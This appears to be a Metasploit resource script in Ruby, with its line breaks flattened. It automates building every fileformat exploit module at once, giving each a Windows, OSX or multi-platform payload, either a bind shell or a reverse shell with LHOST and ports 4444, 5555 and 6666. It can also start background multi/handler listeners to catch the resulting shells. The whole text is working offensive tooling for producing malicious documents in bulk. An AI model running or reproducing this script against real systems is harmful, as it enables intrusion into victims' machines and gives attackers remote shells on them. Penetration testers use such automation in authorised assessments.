if (framework.datastore['WIN_PAYL'] != nil) winpayl = framework.datastore['WIN_PAYL'] else # no payload defined -> we use a messagebox payload :) winpayl = "windows/messagebox" end if (framework.datastore['OSX_PAYL'] != nil) osxpayl = framework.datastore['OSX_PAYL'] else # no payload defined -> we use a generic bind payload :) osxpayl = "generic/shell_bind_tcp" end if (framework.datastore['MULTI_PAYL'] != nil) multipayl = framework.datastore['MULTI_PAYL'] else # no payload defined -> we use a generic bind payload :) multipayl = "generic/shell_bind_tcp" end if (framework.datastore['LHOST'] == nil and (winpayl =~ /reverse/ or osxpayl =~ /reverse/ or multipayl =~ /reverse/)) print_error("please define a global LHOST Variable") return else localIP = framework.datastore['LHOST'] end if (framework.datastore['VERBOSE'] == "true") verbose = 1 #true else verbose = 0 end if (framework.datastore['HANDLERS'] == "true") handlers = 1 #true else handlers = 0 end windows = false multi = false osx = false framework.exploits.each do |exploit,mod| if(exploit.to_s =~ /fileformat/) print_line("generating fileformat exploit: #{exploit.to_s}") run_single("use #{exploit}") if(exploit.to_s =~ /windows/) #we need this info for starting the handlers windows = true #setting the payload run_single("set PAYLOAD #{winpayl}") if(winpayl =~ /reverse/) run_single("set LHOST #{localIP}") run_single("set LPORT 4444") end elsif(exploit.to_s =~ /multi/) #we need this info for starting the handlers multi = true #setting the payload run_single("set PAYLOAD #{multipayl}") if(winpayl =~ /reverse/) run_single("set LHOST #{localIP}") run_single("set LPORT 5555") end elsif(exploit.to_s =~ /osx/) #we need this info for starting the handlers osx = true #setting the payload run_single("set PAYLOAD #{osxpayl}") if(osxpayl =~ /reverse/) run_single("set LHOST #{localIP}") run_single("set LPORT 6666") end end extension = active_module.datastore['FILENAME'].split('.').last filename = exploit.split('/').last run_single("set FILENAME #{filename}.#{extension}") run_single("exploit") print_line end end if(handlers == 1) #starting some handlers for reverse connections run_single("use exploit/multi/handler") if(windows == true and winpayl =~ /reverse/) run_single("set PAYLOAD #{winpayl}") run_single("set LHOST #{localIP}") run_single("set LPORT 4444") run_single("exploit -j") end if(multi == true and multipayl =~ /reverse/) run_single("set PAYLOAD #{multipayl}") run_single("set LHOST #{localIP}") run_single("set LPORT 5555") run_single("exploit -j") end if(osx == true and osxpayl =~ /reverse/) run_single("set PAYLOAD #{osxpayl}") run_single("set LHOST #{localIP}") run_single("set LPORT 6666") run_single("exploit -j") end end run_single("back")